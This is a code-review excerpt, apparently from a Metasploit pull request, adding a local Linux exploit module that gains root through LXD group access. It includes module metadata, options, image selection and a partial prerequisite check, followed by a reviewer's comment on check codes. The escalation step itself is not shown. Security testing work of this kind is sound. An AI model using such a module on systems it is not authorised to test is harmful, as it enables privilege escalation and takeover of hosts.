modules/exploits/linux/local/lxc_privilege_escalation.rb

```diff
@@ -0,0 +1,170 @@
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info, {
+        'Name' => 'LXC Privilege Escalation',
+        'Description' => %q{
+        This module obtains root privileges from any host account with access to LXC. This typically includes any users in the `lxd` group.
+      },
+        'License' => MSF_LICENSE,
+        'Author' => ['stealthcopter'],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
+        'Targets' => [['Automatic', {}]],
+        'DefaultOptions' => {'PrependFork' => true, 'WfsDelay' => 5},
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'DefaultTarget' => 0,
+        'References' => [
+            ['EDB', '46978'],
+            ['URL', 'https://reboare.github.io/lxd/lxd-escape.html'],
+            ['URL', 'https://github.com/lxc/lxd/issues/2003']
+        ],
+        'DisclosureDate' => "May 7 2016" # Earliest mention I could find of this exploit in the LXC github referenced above
+    }
+          ))
+    register_options([
+                         OptString.new('BaseImage', [false, 'The base image used to create the container, if not set the first image found will be used', ''])
+                     ])
+    register_advanced_options([
+                                  OptBool.new('ForceExploit', [false, 'Override check result', false]),
+                                  OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
+                              ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  # Get the base image used to create the container
+  def base_image
+    if datastore['BaseImage'].blank?
+      # Select the first image we find, the only requirement is that we can run chroot inside of it, so any container should suffice
+      cmd_exec('lxc image list -c f --format csv| head -n1').strip
+    else
+      datastore['BaseImage'].to_s
+    end
+  end
+
+  # Check we have all the prerequisites to perform the priv esc
+  def check
+    # Check if we can execute lxc list
+    unless cmd_exec('lxc list && echo true') =~ /true$/
+      print_good('LXC is not accessible by current user.')
+      Exploit::CheckCode::Safe
+      return
+    end
+
+    # Check if there is a locally available image we can use, we need at least one image so we can create a container
+    local_images = cmd_exec('lxc image list -c fd --format csv')
+    local_image_count = local_images.each_line.size
+    vprint_status("Found #{local_image_count} local images:\n" + local_images)
+
+    if local_image_count == 0
+      # No local images found, suggest one is downloaded
+      print_error('There are no local images we can use, please download an image such as alpine or ubuntu.')
+      Exploit::CheckCode::Safe
+      return
```

Comment:
```suggestion
      return Exploit::CheckCode::Appears('There are no local images we can use, please download an image such as alpine or ubuntu.')
```

I don't think this qualifies as `CheckCode::Safe` since it appears to be in a vulnerable configuration, just without an image. Is there a way we could get an image for the user or set up a mostly empty one from the target system?

Reply:
Going to investigate some more, will respond in separate comment.